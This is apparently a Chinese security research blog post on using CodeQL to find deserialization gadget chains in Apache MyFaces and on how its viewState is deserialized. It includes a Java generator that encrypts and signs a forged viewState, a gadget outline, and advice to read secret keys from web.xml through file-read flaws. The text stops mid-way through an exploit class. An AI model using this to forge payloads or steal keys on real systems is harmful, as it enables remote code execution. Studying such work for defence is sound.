{"id":54,"date":"2026-03-01T02:37:18","date_gmt":"2026-02-28T18:37:18","guid":{"rendered":"http:\/\/byname6.cn\/?p=54"},"modified":"2026-03-01T02:38:42","modified_gmt":"2026-02-28T18:38:42","slug":"%e5%88%a9%e7%94%a8codeql%e8%87%aa%e5%8a%a8%e5%8c%96%e5%af%bb%e6%89%be%e5%8f%8d%e5%ba%8f%e5%88%97%e5%8c%96%e9%93%be-myfaces%e5%8f%8d%e5%ba%8f%e5%88%97%e5%8c%96","status":"publish","type":"post","link":"http:\/\/byname6.cn\/index.php\/2026\/03\/01\/%e5%88%a9%e7%94%a8codeql%e8%87%aa%e5%8a%a8%e5%8c%96%e5%af%bb%e6%89%be%e5%8f%8d%e5%ba%8f%e5%88%97%e5%8c%96%e9%93%be-myfaces%e5%8f%8d%e5%ba%8f%e5%88%97%e5%8c%96\/","title":{"rendered":"\u5229\u7528codeQL\u81ea\u52a8\u5316\u5bfb\u627e\u53cd\u5e8f\u5217\u5316\u94fe\u2014myfaces\u53cd\u5e8f\u5217\u5316"},"content":{"rendered":"\n

\u8fd9\u7bc7\u6587\u7ae0\u4ecb\u7ecd\u4e00\u4e0bMyfaces\u53cd\u5e8f\u5217\u5316\u7684\u70b9\uff0c\u4ee5\u53ca\u501f\u6b64\u6765\u5229\u7528CODEQL\u81ea\u52a8\u5316\u5730\u5bfb\u627e\u5176\u539f\u751f\u53cd\u5e8f\u5217\u5316\u94fe\u3002<\/p>\n\n\n\n

\u5229\u7528CODEQL\u81ea\u52a8\u5316\u5bfb\u627e\u539f\u751f\u94fe<\/h1>\n\n\n\n

https:\/\/github.com\/byname66\/GadgetWalker<\/a><\/p>\n\n\n\n

\u5bf9\u4e8e\u8fd9\u79cd\u4e0d\u5927\u7684\u9879\u76ee\uff0c\u6211\u4e60\u60ef\u7b80\u5355\u7c97\u66b4\u5730\u7528maven\u53bb\u4e0b\u8f7dpom.xml\u7684\u6240\u6709\u6e90\u7801\u5230\u5f53\u524d\u76ee\u5f55\uff0c\u5e76\u7528codeql\u7684\u65e0\u6784\u5efa\u6a21\u5f0f\u6784\u9020\u6570\u636e\u5e93<\/p>\n\n\n\n

mvn dependency:unpack-dependencies -Dclassifier=sources -DoutputDirectory=.\/deps-src
\u200b
codeql database create myfacesDB --language=java --source-root=. --build-mode=none<\/pre>\n\n\n\n
\u4e0b\u8f7d\u6e90\u7801\u8fd9\u4e00\u6b65\u65f6\uff0c\u4e5f\u53ef\u4ee5\u81ea\u884c\u9009\u62e9\u52a0\u5165tomcat\u7684\u6e90\u7801\u7b49\u7b49\uff0c\u4ee5\u4e30\u5bccsink source\u7684\u94fe\u8def\u3002<\/p>\n\n\n\n
\u81ea\u52a8\u5316\u5bfb\u627e\u53cd\u5e8f\u5217\u5316\u94fe\u666e\u904d\u7684\u601d\u8def\u5c31\u662f\u7ef4\u62a4\u4e00\u4e2asink.qll\uff0csource.qll\uff0c\u4f5c\u4e3asink\uff0csource\u65b9\u6cd5\u7684\u96c6\u5408\uff0c\u67e5\u8be2\u8bed\u53e5\u4e2d\u518d\u4f7f\u7528polyCalls\u8fdb\u884c\u8fde\u901a\u6027\u67e5\u8be2\u3002<\/p>\n\n\n\n
\u8fd9\u91cc\u6709\u51e0\u70b9\u7ec6\u8282\u503c\u5f97\u6ce8\u610f<\/p>\n\n\n\n
1\u3001\u5728\u6ca1\u6709\u7f16\u8bd1 JDK \u6e90\u7801\u7684\u60c5\u51b5\u4e0b\uff0ccodeql \u4f1a\u7ecf\u5e38\u6027\u5730\u5ffd\u7565\u6389 JDK \u5185\u90e8\u7c7b\u7684 readObject \u7b49\u65b9\u6cd5\u3002<\/strong><\/p>\n\n\n\n
\u5bf9\u6b64\u6211\u4eec\u53ef\u4ee5\u5c06\u5e38\u89c1\u7684\u80fd\u63a5\u4e0areadObject\u7684\u65b9\u6cd5\u4f5c\u4e3asource\u70b9\uff0c\u5982\u679c\u627e\u5230\u4e86\u76f8\u5e94\u94fe\u6761\u76f4\u63a5\u8854\u63a5\u4e0a\u53bb\u5373\u53ef\u3002\u6bd4\u5982HashMap#hashCode\uff0cHashTable#equal<\/strong>\u7b49\u3002<\/p>\n\n\n\n
2\u3001sink \u70b9\u6761\u4ef6\u8fc7\u4e8e\u5bbd\u677e\u5bfc\u81f4\u5927\u91cf\u8bef\u62a5<\/strong><\/p>\n\n\n\n
\u8fd9\u70b9\u5c31\u9700\u8981\u9488\u5bf9\u6027\u5730\u5bf9\u5e94\u4e0d\u540c\u7684 sink \u70b9\u5236\u5b9a\u5199\u6cd5\u4e86\u3002<\/p>\n\n\n\n
\u4ee5 EL \u6ce8\u5165\u7684 sink \u4e3a\u4f8b\uff0c\u6211\u5199\u7684\u5224\u65ad\u903b\u8f91\u662f\u8fd9\u6837\u7684\uff1a<\/p>\n\n\n\n
1\u3001EL \u6ce8\u5165 sink \u65b9\u6cd5\u9700\u8981\u8c03\u7528\u6709 el \/ expression \u7279\u5f81\u5305\u540d\u7684\u7c7b\u7684 getValue \u6216 findValue \u65b9\u6cd5<\/p>\n\n\n\n
2\u3001\u8be5\u65b9\u6cd5\u8c03\u7528 getValue \u6216 findValue \u65b9\u6cd5\u7684\u5bf9\u8c61\u5fc5\u987b\u8981\u662f\u8be5\u7c7b\u6210\u5458\u53d8\u91cf\uff0c\u80fd\u591f\u53cd\u5c04\u4fee\u6539\u3002\uff08\u53ea\u8003\u8651\u4e86\u8fd9\u79cd\u7b80\u5355\u7684\u60c5\u51b5\uff0c\u6bd4\u5982\u8fd9\u4e2a\u5bf9\u8c61\u662f\u7531\u5176\u5b83\u65b9\u6cd5\u4f20\u9012\uff0c\u4e14\u53ef\u63a7\u7684\u8fd9\u79cd\u60c5\u51b5\u5c31\u6ca1\u6709\u5199\u5165\u903b\u8f91\uff0c\u5b9e\u73b0\u8d77\u6765\u8981\u6bd4\u8f83\u590d\u6742\uff09<\/p>\n\n\n\n
\u6bd4\u5982\u8fd9\u79cd\u5c31\u80fd\u88ab\u89c6\u4f5c\u4e00\u4e2a sink \u65b9\u6cd5\uff1a<\/p>\n\n\n\n
public class Test{
\u200b
  javax.el.%.%Expression% expression;
  
  public void imSink(){
      expression.getValue();
  }
\u200b
}<\/pre>\n\n\n\n
3\u3001\u67e5\u8be2\u8bed\u53e5\u6ce8\u91ca\u5e26\u4e0a * @kind path-problem\uff0c\u53ef\u4ee5\u5c55\u793a\u8def\u5f84<\/strong><\/p>\n\n\n\n
\u67e5\u8be2\u8bed\u53e5\u5c31\u5229\u7528polyCalls\u8c13\u8bcd\u914d\u5408edges\u5373\u53ef\u3002<\/p>\n\n\n\n
\u8fd9\u91cc\u5199\u4e86\u4e00\u4e2a\u521d\u59cb\u7248\u672c\uff0c\u6709\u6bd4\u8f83\u666e\u904d\u7684sink\u3001source\u70b9\uff0c\u6bd4\u8f83\u7b80\u964b\uff0c\u53ef\u4ee5\u4efb\u610f\u8865\u5145\uff1a<\/p>\n\n\n\n
https:\/\/github.com\/byname66\/GadgetWalker<\/a><\/p>\n\n\n\n
\u5728myfaces\u7684\u539f\u751f\u94fe\u67e5\u8be2\u4e2d\uff0c\u6211\u4eec\u5c31\u80fd\u67e5\u8be2\u5230\u8fd9\u4e9b\u7ed3\u679c \uff1a<\/p>\n\n\n\n
\"image-20260301015122684\"\/<\/div><\/figure>\n\n\n\n
\u6d4b\u8bd5\u4e0b\u6765\u8fd8\u662f\u633a\u591a\u90fd\u80fd\u4f7f\u7528\u7684\uff0c\u53ea\u662f\u76f8\u5e94\u7684\u8bef\u62a5\u8fd8\u662f\u4f1a\u6709\uff0c\u4ee5\u540e\u6162\u6162\u5b8c\u5584\u3002<\/p>\n\n\n\n
\u53cd\u5e8f\u5217\u5316\u70b9<\/h1>\n\n\n\n
\u5904\u7406\u8bf7\u6c42\u7684\u5927\u4f53\u67b6\u6784<\/strong>\u4e5f\u548cMojarra\u5dee\u4e0d\u591a\uff0c\u8c03\u7528jsf\u89c4\u8303\u7684javax.faces.webapp.FacesServlet#service<\/code>\u540e\uff0c\u8fdb\u5165\u5230myfaces\u81ea\u5df1\u5b9e\u73b0\u7684org.apache.myfaces.lifecycle<\/code>\u53bb\u5faa\u73af \u8c03\u7528\u516d\u4e2aphase\u8fdb\u884c\u516d\u4e2a\u9636\u6bb5\u3002<\/p>\n\n\n\n
\"image-20260202172408625\"\/<\/div><\/figure>\n\n\n\n
\u5176\u4e2d\u4e5f\u662f\u6062\u590d\u89c6\u56fe\uff08Restore View\uff09<\/strong>\u8fd9\u4e00\u6b65\u8fdb\u884c\u4e86\u53cd\u5e8f\u5217\u5316\u3002<\/p>\n\n\n\n
\u540c\u6837\uff0cmyfaces\u4e5f\u5206client\u548cserver\u5b58\u50a8viewState<\/p>\n\n\n\n
<context-param>
  <param-name>javax.faces.STATE_SAVING_METHOD<\/param-name>
  <param-value>client<\/param-value>
<\/context-param><\/pre>\n\n\n\n
server\u5b58\u50a8viewState\u7684\u60c5\u51b5\u4e0b\uff0cclient to server\u7684\u4f9d\u65e7\u662fsession\uff0c\u670d\u52a1\u7aef\u4f1a\u53d6\u51fa\u8be5session\u5bf9\u5e94\u7684SerializedViewCollection<\/strong>\u5e8f\u5217\u5316\u6d41\u5e76\u53cd\u5e8f\u5217\u5316\u3002<\/p>\n\n\n\n
\u5bf9\u4e8e\u670d\u52a1\u7aef\u5b58\u50a8viewState\u7684\u60c5\u51b5\u80fd\u5426\u5229\u7528\u8fdb\u884c\u53cd\u5e8f\u5217\u5316\u7a0d\u540e\u518d\u7814\u7a76\uff0c\u5148\u6765\u7b80\u5355\u8fc7\u8fc7client\u7aef\u5b58\u50a8\u7684\u53cd\u5e8f\u5217\u5316\u6d41\u7a0b\u548c\u5229\u7528\u3002<\/p>\n\n\n\n
in client<\/h2>\n\n\n\n
\u5728myfaces\u6062\u590d\u89c6\u56fe\u7684\u6838\u5fc3\u903b\u8f91\u4e2d\uff0c\u4f1a\u7ecf\u8fc7\u4e24\u4e2a\u91cd\u8981\u7684\u63a5\u53e3\u65b9\u6cd5\uff1a<\/p>\n\n\n\n
org.apache.myfaces.application.viewstate.token.StateTokenProcessor#decode()<\/code><\/p>\n\n\n\n
\u53d6\u51fa\u8bf7\u6c42\u4e2d\u7684viewstate\u53c2\u6570\u5e76\u4f5c\u4e00\u4e9b\u64cd\u4f5c\uff0c\u7ed3\u679c\u5b58\u5165savedStateObject\uff0c\u4f5c\u4e3a\u4e0b\u4e00\u6b65\u7684\u5165\u53c2\u3002
client-viewState\u6b64\u5904\u53cd\u5e8f\u5217\u5316<\/pre>\n\n\n\n
org.apache.myfaces.application.StateCache#restoreSerializedView()<\/code><\/p>\n\n\n\n
\u5bf9savedStateObject\u7684\"\u540e\u5904\u7406\"\u3002
server-vieWState\u670d\u52a1\u7aef\u6b64\u5904\u53cd\u5e8f\u5217\u5316<\/pre>\n\n\n\n
\u6839\u636eviewState\u5b58\u50a8\u5728\u5ba2\u6237\u7aef\/\u670d\u52a1\u7aef\uff0c\u5bf9\u5e94\u7684\u5b9e\u73b0\u7c7b\u5206\u522b\u4e3aClientSideStateTokenProcessor<\/code>\/ServiceSideStateTokenProcessor<\/code><\/p>\n\n\n\n
ClientSideStateCacheImpl<\/code>\/ServerSideStateCacheImpl<\/code><\/p>\n\n\n\n
\u5728\u5ba2\u6237\u7aef\u6a21\u5f0f\u4e0bClientSideStateTokenProcessor#StateTokenProcessor()\u65b9\u6cd5\u4e2d\uff0c\u5b9e\u73b0\u4e86\u53cd\u5e8f\u5217\u5316\u903b\u8f91\uff1a<\/p>\n\n\n\n
\"image-20260202174300394\"\/<\/div><\/figure>\n\n\n\n
StateUtils#reconstruct()\u4e3b\u8981\u903b\u8f91\u53ef\u4ee5\u770b\u4f5c\u8fd9\u51e0\u884c\uff1a<\/p>\n\n\n\n
public static final Object reconstruct(String string, ExternalContext ctx){
            bytes = string.getBytes(ZIP_CHARSET);
            bytes = decode(bytes);        \/\/base64\u89e3\u7801
            bytes = decrypt(bytes, ctx);  \/\/\u5bc6\u7801\u5b66\u89e3\u5bc6
            return getAsObject(bytes, ctx); \/\/=readObject
}<\/pre>\n\n\n\n
\u5176\u4e2dmyfaces\u662f\u9ed8\u8ba4\u52a0\u5bc6\u7684\uff0c\u4e14AES \/ CBC \/ PKCS5Padding + HMAC\uff0c\u5148\u9a8c\u7b7e\u518d\u89e3\u5bc6\u3002\u8fd9\u5bfc\u81f4\u4e86Padding Oracle\u7b49\u5bc6\u7801\u5b66 \u653b\u51fb\u5931\u6548\uff0c\u4e14\u5fc5\u987b\u8981\u77e5\u9053\u5bc6\u94a5\u624d\u80fd\u8fdb\u884c\u540e\u7eed\u653b\u51fb\u3002\u540cMojarra\u4e00\u6837\uff0c\u5982\u679c\u5b58\u5728\u4efb\u610f\u6587\u4ef6\u8bfb\uff0c\u53ef\u4ee5\u5c1d\u8bd5\u53bbweb.xml\u7b49\u914d\u7f6e\u6587\u4ef6\u8bfb\u5bc6\u94a5\uff0c\u5982\u679c\u6ca1\u6709\u6307\u5b9a\u5bc6\u94a5\u5219\u968f\u673a\u751f\u6210\u3002<\/p>\n\n\n\n
\u53ef\u4ee5\u901a\u8fc7\u8fd9\u6837\u4e00\u4e2a\u811a\u672c\u8f93\u51fa\u5408\u6cd5\u7684\u5e8f\u5217\u5316\u6d41\u7f16\u7801\uff1a<\/p>\n\n\n\n
import javax.crypto.Cipher;
import javax.crypto.Mac;
import javax.crypto.SecretKey;
import javax.crypto.spec.IvParameterSpec;
import javax.crypto.spec.SecretKeySpec;
import java.io.ByteArrayOutputStream;
import java.io.ObjectOutputStream;
import java.util.Base64;
import java.util.zip.DeflaterOutputStream;
\u200b
public class GenerateLegitString {
    
\/\/ \u786c\u7f16\u7801\u7684\u5bc6\u94a5\u914d\u7f6e\uff08\u9700\u8981\u4e0e\u89e3\u5bc6\u7aef\u5339\u914d\uff09
private static final String ALGORITHM = \"AES\"; \/\/ \u6216 \"DES\" \u7b49
private static final String MODE = \"CBC\";      \/\/ \u6216 \"ECB\" \u7b49
private static final String PADDING = \"PKCS5Padding\";
\u200b
\/\/ \u5bc6\u94a5\uff08\u5fc5\u987b\u662f\u6b63\u786e\u7684\u957f\u5ea6\uff1aAES-128=16\u5b57\u8282\uff0cAES-256=32\u5b57\u8282\uff09
private static final byte[] SECRET_KEY_BYTES = \"0123456789abcdef\".getBytes(); \/\/ 16\u5b57\u8282
private static final byte[] MAC_KEY_BYTES = \"abcdefghijklmnop\".getBytes();    \/\/ 16\u5b57\u8282
\u200b
\/\/ IV\uff08CBC\u6a21\u5f0f\u9700\u8981\uff0c16\u5b57\u8282\uff09
private static final byte[] IV = \"1234567890abcdef\".getBytes();
\u200b
\/\/ MAC\u7b97\u6cd5
private static final String MAC_ALGORITHM = \"HmacSHA256\";
\u200b
\/\/ \u5b57\u7b26\u96c6
private static final String ZIP_CHARSET = \"ISO-8859-1\";
\u200b
public static void main(String[] args) throws Exception {
    \/\/ 1. \u51c6\u5907\u8981\u5e8f\u5217\u5316\u7684\u5bf9\u8c61
    Object data = createDataObject(); \/\/ \u521b\u5efa\u4f60\u7684\u6570\u636e\u5bf9\u8c61
    
    \/\/ 2. \u5e8f\u5217\u5316\u5e76\u538b\u7f29
    byte[] objectBytes = serializeAndCompress(data);
    
    \/\/ 3. \u52a0\u5bc6\u548cMAC\u7b7e\u540d
    byte[] encryptedBytes = encryptWithMac(objectBytes);
    
    \/\/ 4. Base64\u7f16\u7801
    String finalString = Base64.getEncoder().encodeToString(encryptedBytes);
    
    System.out.println(\"\u751f\u6210\u7684\u5408\u6cd5\u5b57\u7b26\u4e32: \" + finalString);
}
\u200b
\/**
 * \u521b\u5efa\u8981\u5e8f\u5217\u5316\u7684\u6570\u636e\u5bf9\u8c61
 *\/
private static Object createDataObject() {
    \/\/ \u6839\u636e\u4f60\u7684\u5b9e\u9645\u9700\u6c42\u521b\u5efa\u5bf9\u8c61
    \/\/ \u4f8b\u5982\uff1aMap\u3001List\u3001\u81ea\u5b9a\u4e49\u5bf9\u8c61\u7b49
    java.util.HashMap<String, String> map = new java.util.HashMap<>();
    map.put(\"key1\", \"value1\");
    map.put(\"key2\", \"value2\");
    return map;
}
\u200b
\/**
 * \u5e8f\u5217\u5316\u5e76\u538b\u7f29\uff08\u6a21\u62dfgetAsObject\u7684\u9006\u64cd\u4f5c\uff09
 *\/
private static byte[] serializeAndCompress(Object obj) throws Exception {
    ByteArrayOutputStream baos = new ByteArrayOutputStream();
    try (ObjectOutputStream oos = new ObjectOutputStream(
            new DeflaterOutputStream(baos))) {
        oos.writeObject(obj);
    }
    return baos.toByteArray();
}
\u200b
\/**
 * \u52a0\u5bc6\u5e76\u6dfb\u52a0MAC\u7b7e\u540d\uff08decrypt\u7684\u9006\u64cd\u4f5c\uff09
 *\/
private static byte[] encryptWithMac(byte[] data) throws Exception {
    \/\/ \u521b\u5efa\u5bc6\u94a5
    SecretKey secretKey = new SecretKeySpec(SECRET_KEY_BYTES, ALGORITHM);
    SecretKey macSecretKey = new SecretKeySpec(MAC_KEY_BYTES, MAC_ALGORITHM.split(\"Hmac\")[1]);
    
    \/\/ 1. \u52a0\u5bc6\u6570\u636e
    Cipher cipher = Cipher.getInstance(ALGORITHM + \"\/\" + MODE + \"\/\" + PADDING);
    if (IV != null) {
        IvParameterSpec ivSpec = new IvParameterSpec(IV);
        cipher.init(Cipher.ENCRYPT_MODE, secretKey, ivSpec);
    } else {
        cipher.init(Cipher.ENCRYPT_MODE, secretKey);
    }
    byte[] encrypted = cipher.doFinal(data);
    
    \/\/ 2. \u8ba1\u7b97MAC\uff08Encrypt-then-MAC \u7ec4\u5408\u65b9\u5f0f\uff09
    Mac mac = Mac.getInstance(MAC_ALGORITHM);
    mac.init(macSecretKey);
    mac.update(encrypted);
    byte[] macBytes = mac.doFinal();
    
    \/\/ 3. \u5408\u5e76\uff1a\u52a0\u5bc6\u6570\u636e + MAC
    byte[] result = new byte[encrypted.length + macBytes.length];
    System.arraycopy(encrypted, 0, result, 0, encrypted.length);
    System.arraycopy(macBytes, 0, result, encrypted.length, macBytes.length);
    
    return result;
}
\u200b
\/**
 * \u5b8c\u6574\u751f\u6210\u65b9\u6cd5\uff08\u4f9b\u5916\u90e8\u8c03\u7528\uff09
 *\/
public static String generateLegitString(Object data) throws Exception {
    \/\/ \u5e8f\u5217\u5316\u5e76\u538b\u7f29
    byte[] objectBytes = serializeAndCompress(data);
    
    \/\/ \u52a0\u5bc6\u548cMAC\u7b7e\u540d
    byte[] encryptedBytes = encryptWithMac(objectBytes);
    
    \/\/ Base64\u7f16\u7801
    return Base64.getEncoder().encodeToString(encryptedBytes);
}<\/pre>\n\n\n\n
in server<\/h2>\n\n\n\n
\u5728server-viewState\u6a21\u5f0f\u4e0b\uff0cServiceSideStateTokenProcessor#code\u4ec5\u4ec5\u8fdb\u884c\u89e3\u7801\u64cd\u4f5c\uff1a<\/p>\n\n\n\n
String token
byte[] tokenBytes = token.getBytes(StateUtils.ZIP_CHARSET);
byte[] tokenBytesDecoded = StateUtils.decode(tokenBytes);       \/\/base64
String tokenDecoded = new String(tokenBytesDecoded, StateUtils.ZIP_CHARSET);
\u200b
return tokenDecoded;<\/pre>\n\n\n\n
\u6b64\u65f6tokenDecoded\u662f\u4e00\u4e3216\u8fdb\u5236\u5b57\u7b26\u4e32\uff0c\u968f\u540e\u5728ServerSideStateCacheImpl#restoreSerializedView()<\/code>\u5148\u8fdb\u884c\u5341\u516d\u8fdb\u5236\u8f6cbyte\uff0c\u518d\u4f5c\u4e3a\u5165\u53c2\u8c03\u7528ServerSideStateCacheImpl#getSerializedViewFromServletSession()<\/code>\u3002<\/p>\n\n\n\n
\u8fd9\u4e2a\u65b9\u6cd5\u6d89\u53ca\u5230\u53cd\u5e8f\u5217\u5316\u7684\u903b\u8f91\u5c31\u8fd9\u51e0\u53e5\uff1a<\/p>\n\n\n\n
  SerializedViewCollection viewCollection = (SerializedViewCollection) externalContext
                    .getSessionMap().get(SERIALIZED_VIEW_SESSION_ATTR);
            if (viewCollection != null)
            {
                if (sequence != null)
                {
                    Object state = viewCollection.get(
                            getSessionViewStorageFactory().createSerializedViewKey(
                            context, viewId, sequence));
                    if (state != null)
                    {
                        serializedView = deserializeView(state);
                    }
                }
            }<\/pre>\n\n\n\n
\u4eceServletExternalContextImpl\u5b9e\u4f8b\u7684_sessionMap\u4e2d\u83b7\u53d6\u952e\u4e3aSERIALIZED_VIEW_SESSION_ATTR\u7684\u503c\uff0c\u4f5c\u4e3aviewCollection\u3002<\/p>\n\n\n\n
\u5305\u88c5\u4e00\u4e2a\u63cf\u8ff0\u5f53\u524d\u4fe1\u606f\u7684SerializedViewKey\uff0c\u5e76\u4f5c\u4e3a\u952e\u4ece\u83b7\u5f97\u7684viewCollection\u53d6\u503c\u3002<\/p>\n\n\n\n
\"image-20260202182241377\"\/<\/div><\/figure>\n\n\n\n
deserializeView\u65b9\u6cd5\u53ea\u4f1a\u5bf9byte[]\u7c7b\u578b\u7684\u5165\u53c2\u53cd\u5e8f\u5217\u5316<\/strong>\u3002<\/p>\n\n\n\n
\u53ea\u8981\u7ecf\u8fc7\u8c03\u8bd5\u6211\u4eec\u5c31\u80fd\u53d1\u73b0\uff0c\u7528\u6211\u4eec\u5982\u4eca\u7684\u914d\u7f6e\u65e0\u8bba\u600e\u4e48\u8bf7\u6c42 \uff0cstate\uff0c\u4e5f\u5c31\u662fdeserializeView\u7684\u5165\u53c2\u4e00\u822c\u90fd\u4e0d\u4f1a\u662fbyte\uff1a<\/p>\n\n\n\n
\"image-20260202182339438\"\/<\/div><\/figure>\n\n\n\n
\u5230\u5e95\u4ec0\u4e48\u60c5\u51b5\u4e0b\u8fd9\u91cc\u7684value\u503c\u624d\u4f1a\u662fbyte[]\u5462\uff1f<\/p>\n\n\n\n
\u8fd9\u91cc\u4e5f\u6d89\u53ca\u5230Myfaces\u7684\u9ed8\u8ba4\u914d\u7f6e\uff1a<\/p>\n\n\n\n
<context-param>
  <param-name>org.apache.myfaces.SERIALIZE_STATE_IN_SESSION<\/param-name>
  <param-value>true<\/param-value>
<\/context-param><\/pre>\n\n\n\n
Myfaces\u9ed8\u8ba4\u8fd9\u6761\u914d\u7f6e\u4e3afalse\uff0c\u4f53\u73b0\u5728\u4ee3\u7801\u903b\u8f91\u4e2d\u5c31\u662f\uff0cMyfaces\u5bf9server-viewState\u9ed8\u8ba4\u4ee5\u5bf9\u8c61\u7684\u65b9\u5f0f\u5b58\u50a8\uff0c\u800c\u4e0d\u662f\u5e8f\u5217\u5316\u6d41\u3002<\/p>\n\n\n\n
\u9274\u4e8e\u51e0\u4e4e\u6ca1\u4eba\u53bb\u5f00\u542f\u8fd9\u4e2a\u914d\u7f6e\uff0c\u5b98\u65b9\u6587\u6863\u91cc\u9762\u8fd9\u4e2a\u914d\u7f6e\u4e5f\u662f\u88ab\u62dc\u8bbf\u5728\u7284\u89d2\u65ee\u65ef\u91cc\u9762\uff0c\u67e5\u90fd\u96be\u4ee5\u67e5\u5230\uff0c\u8fd9\u91cc\u5c31\u4e0d\u6df1\u5165\u53bb\u8c08\u8bba\u5f00\u542f\u8fd9\u4e2a\u9009\u9879\u7684\u5229\u7528\u4e86\u3002<\/p>\n\n\n\n
\u6211\u4eec\u4e0d\u59a8\u8f6c\u800c\u53bb\u6df1\u6316\uff0c\u5c31\u8ba9\u4e00\u5207\u90fd\u5728\u9ed8\u8ba4\u914d\u7f6e\u7684\u72b6\u6001\u4e0b\uff0c\u8fd9\u4e2a_sessionMap\u80fd\u5426\u88ab\u6ce8\u5165\u4e00\u4e2a\u5e26\u6709\u6076\u610fbyte[]\u7684viewCollection\u5462\uff1f<\/strong><\/p>\n\n\n\n
\u5bf9_sessionMap\u5bfb\u627e\u8c03\u7528\uff0c\u552f\u4e00\u4e00\u4e2a\u80fd\u63a7\u5236\u5199\u5165\u503c\u7684\u65b9\u6cd5\u5c31\u662fServletExternalContextImpl#getSessionMap()\uff1a<\/p>\n\n\n\n
\"image-20260203145253601\"\/<\/div><\/figure>\n\n\n\n
\"image-20260203150712821\"\/<\/div><\/figure>\n\n\n\n
_sessionMap\u662fServletExternalContextImpl\u7684\u6210\u5458\u53d8\u91cf\uff0c\u800cServletExternalContextImpl\u76f8\u5f53\u4e8e\u4e00\u4e2aJSF\u8bf7\u6c42\u7684\u751f\u547d\u5468\u671f\uff0c\u6211\u4eec\u53ef\u4ee5\u4e3a_sessionMap\u8bbe\u5b9a\u4e00\u4e2aField Watchpoint\uff0c\u4ee5\u4fbf\u76d1\u542c\u5b83\u5728\u6574\u4e2a\u751f\u547d\u5468\u671f\u4e2d\u503c\u7684\u53d8\u5316\u3002<\/p>\n\n\n\n
\"image-20260203164336373\"\/<\/div><\/figure>\n\n\n\n
\"image-20260203174828143\"\u53ef\u4ee5\u53d1\u73b0\u6574\u4e2a\u8bf7\u6c42\u8fc7\u7a0b\u4e2d\uff0c_httpServletRequest\u90fd\u662fTOMCAT\u5bb9\u5668\u91cc\u9762\u7684RequestFacade\u3002<\/p>\n\n\n\n
  SerializedViewCollection viewCollection = (SerializedViewCollection) externalContext
                    .getSessionMap().get(SERIALIZED_VIEW_SESSION_ATTR);
            if (viewCollection != null)
            {
                if (sequence != null)
                {
                    Object state = viewCollection.get(
                            getSessionViewStorageFactory().createSerializedViewKey(
                            context, viewId, sequence));
                    if (state != null)
                    {
                        serializedView = deserializeView(state);
                    }
                }
            }<\/pre>\n\n\n\n
\u518d\u6765\u770b\u8fd9\u51e0\u884c\u4ee3\u7801\uff0c\u4e5f\u5c31\u662f\u8bf4\uff0c\u5148\u83b7\u53d6RequestFacade\u91cc\u9762\u5b58\u50a8\u7684SerializedViewCollection\uff0c\u518d\u4ece\u8fd9\u4e2aSerializedViewCollection\u4e2d\u901a\u8fc7get\u83b7\u53d6key\u5bf9\u5e94\u7684value\u3002<\/p>\n\n\n\n
\u5b9e\u9645\u4e0a\u662f\u901a\u8fc7SerializedViewCollection\u4e2d\u7684_serializedViews.get(key)\u8fdb\u884c\u83b7\u53d6\u3002<\/p>\n\n\n\n
private final Map<SerializedViewKey, Object> _serializedViews = 
    new HashMap<SerializedViewKey, Object>();<\/pre>\n\n\n\n
\u95ee\u9898\u6765\u4e86\uff0cRequestFacade\u91cc\u9762\u5b58\u50a8\u7684SerializedViewCollection\u53ef\u63a7\u5417\uff1f\u5982\u679c\u53ef\u63a7\u6211\u4eec\u6b64\u5904\u5c31\u53ef\u4ee5\u8ba9\u4f20\u5165deserializeView\u7684state\u4e3a\u6076\u610f\u5f90\u5e8f\u5217\u5316\u6d41\u3002<\/p>\n\n\n\n
\u7b54\u6848\u662f\u4e0d\u80fd\u3002<\/p>\n\n\n\n
SerializedViewCollection\u5728myfaces\u6846\u67b6\u91cc\u5c31\u76f8\u5f53\u4e8e\u662fsession\uff0c\u5728Tomcat\u5185\u7f6e\u7684getSession\u65b9\u6cd5\u4e2d\u88ab\u521b\u5efa\uff0c\u4e14\u6709\u4e14\u53ea\u6709\u8fd9\u4e00\u4e2a\u521b\u5efa\u7684\u8def\u5f84\u3002<\/p>\n\n\n\n
\u5f53\u7136SerializedViewCollection\u5728\u5916\u90e8\u6709\u4e00\u4e9b\u5730\u65b9\u88ab\u8c03\u7528\u4e86put\u65b9\u6cd5\uff1a<\/p>\n\n\n\n
\"image-20260203175930222\"\/<\/div><\/figure>\n\n\n\n
\u53ef\u60dc\u7684\u662f\uff0c\u5355\u7eaf\u7684\u5904\u7406\u8bf7\u6c42\u7684\u8c03\u7528\u94fe\u65e0\u6cd5\u53ef\u63a7\u5730\u53bb\u64cd\u63a7\u8fd9\u4e9bput\u3002<\/p>\n\n\n\n
\u94fe\u5b50\u5bfb\u627e\/\u5229\u7528<\/h1>\n\n\n\n
\u90a3\u4e48\u770b\u6765\uff0cmyfaces\u6846\u67b6\u53cd\u5e8f\u5217\u5316\u7684\u5229\u7528\u5c31\u9650\u5b9a\u4e8eclient-viewState\u7684\u60c5\u51b5\u4e86\uff0c\u4e14\uff0c\u8fd8\u8981\u60f3\u529e\u6cd5\u53bb\u83b7\u53d6\u5b83\u7684\u79c1\u94a5\uff0c\u53ef\u80fd\u5229\u7528\u7684\u60c5\u666f\u53ea\u80fd\u662f\u8fd9\u6837\uff1a<\/p>\n\n\n\n
\u6bd4\u5982\u67d0\u67d0OA\u5c31\u5229\u7528\u4e86myfaces\u6846\u67b6\u4e14\u628a\u79c1\u94a5\u786c\u7f16\u7801\u5728\u4e86web.xml\u7b49\u914d\u7f6e\u6587\u4ef6\u3002\u5e94\u7528\u81ea\u5df1\u58f0\u660e\u4e86\u79c1\u94a5\uff0c\u4e14\u5b58\u5728\u4efb\u610f\u6587\u4ef6\u8bfb\uff0c\u80fd\u53bbweb.xml\u7b49\u914d\u7f6e\u6587\u4ef6\u91cc\u9762\u8bfb\u79c1\u94a5\u3002<\/p>\n\n\n\n
\u5229\u7528\u524d\u9762\u63d0\u5230\u7684CODEQL\u81ea\u52a8\u5316\u5bfb\u627e\uff0c\u6211\u4eec\u53ef\u4ee5\u627e\u5230\u633a\u591a\u80fd\u591f\u539f\u751f\u5229\u7528\u7684\u94fe\u5b50\u7684\uff0c\u6bd4\u5982\u8fd9\u91cc\u968f\u4fbf\u7528\u4e00\u4e2a\uff1a<\/p>\n\n\n\n
\"image-20260301023051115\"\/<\/div><\/figure>\n\n\n\n
\u5305\u88c5\u597dContextAwareTagValueExpression\u540e\uff0c\u653e\u5230HashMap\u7684key\u4f4d\u7f6e\u5373\u53ef\u3002<\/p>\n\n\n\n
public class bornSer {
\u200b
    private static final String ALGORITHM = \"DES\";
    private static final String MODE = \"ECB\";
